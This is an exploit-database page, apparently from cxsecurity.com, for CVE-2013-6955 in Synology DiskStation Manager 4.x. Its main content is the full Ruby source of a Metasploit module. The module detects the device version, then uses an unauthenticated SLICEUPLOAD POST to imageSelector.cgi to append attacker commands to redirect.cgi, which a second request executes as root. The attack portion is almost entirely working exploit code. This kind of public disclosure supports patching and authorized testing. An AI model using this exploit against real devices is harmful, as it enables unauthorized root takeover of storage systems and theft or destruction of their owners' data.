Synology DiskStation Manager SLICEUPLOAD Remote Command Execution

2013.12.23
Credit: Markus Wulftange
Risk: High
Local: No
Remote: Yes
CVE: CVE-2013-6955
CWE: CWE-264
CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## ## This module requires Metasploit: http//metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+) &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x def initialize(info={}) super(update_info(info, 'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution", 'Description' => %q{ This module exploits a vulnerability found in Synology DiskStation Manager (DSM) versions 4.x, which allows the execution of arbitrary commands under root privileges. The vulnerability is located in /webman/imageSelector.cgi, which allows to append arbitrary data to a given file using a so called SLICEUPLOAD functionality, which can be triggered by an unauthenticated user with a specially crafted HTTP request. This is exploited by this module to append the given commands to /redirect.cgi, which is a regular shell script file, and can be invoked with another HTTP request. Synology reported that the vulnerability has been fixed with versions 4.0-2259, 4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable. }, 'Author' => [ 'Markus Wulftange' # Discovery, Metasploit module ], 'References' => [ [ 'CVE', '2013-6955' ], ], 'Privileged' => false, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true, 'Space' => 0x31337, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Oct 31 2013' )) register_options( [ Opt::RPORT(5000) ], self.class) end def check print_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('webman', 'info.cgi'), 'vars_get' => { 'host' => ''} }) if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN version = "#{$~[:major]}.#{$~[:minor]}" build = $~[:build] model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else print_status("#{peer} - Detection failed") return Exploit::CheckCode::Unknown end print_status("#{peer} - Model #{model} with version #{version}-#{build} detected") case version when '4.0' return Exploit::CheckCode::Vulnerable if build < '2259' when '4.1' return Exploit::CheckCode::Vulnerable when '4.2' return Exploit::CheckCode::Vulnerable if build < '3243' when '4.3' return Exploit::CheckCode::Vulnerable if build < '3810' return Exploit::CheckCode::Detected if build == '3810' end Exploit::CheckCode::Safe end def exploit cmds = [ # sed is used to restore the redirect.cgi "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi", payload.encoded ].join("\n") mime_msg = Rex::MIME::Message.new mime_msg.add_part('login', nil, nil, 'form-data; name="source"') mime_msg.add_part('logo', nil, nil, 'form-data; name="type"') # unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n, # so we use a placeholder and replace it later cmd_placeholder = Rex::Text::rand_text_alphanumeric(10) mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil, 'form-data; name="foo"; filename="bar"') post_body = mime_msg.to_s post_body.strip! post_body.sub!(cmd_placeholder, cmds) # fix multipart encoding post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands print_status("#{peer} - Injecting the payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('webman', 'imageSelector.cgi'), 'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}", 'headers' => { 'X-TYPE-NAME' => 'SLICEUPLOAD', 'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi' }, 'data' => post_body }) unless res and res.code == 200 and res.body.include?('error_noprivilege') fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end # send request to invoke the injected shell commands print_status("#{peer} - Executing the payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('redirect.cgi'), }) # Read command output if cmd/unix/generic payload was used if datastore['CMD'] unless res and res.code == 200 fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end print_good("#{peer} - Command successfully executed") print_line(res.body) end end end

References:

http://cxsecurity.com/issue/WLB-2013120145


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top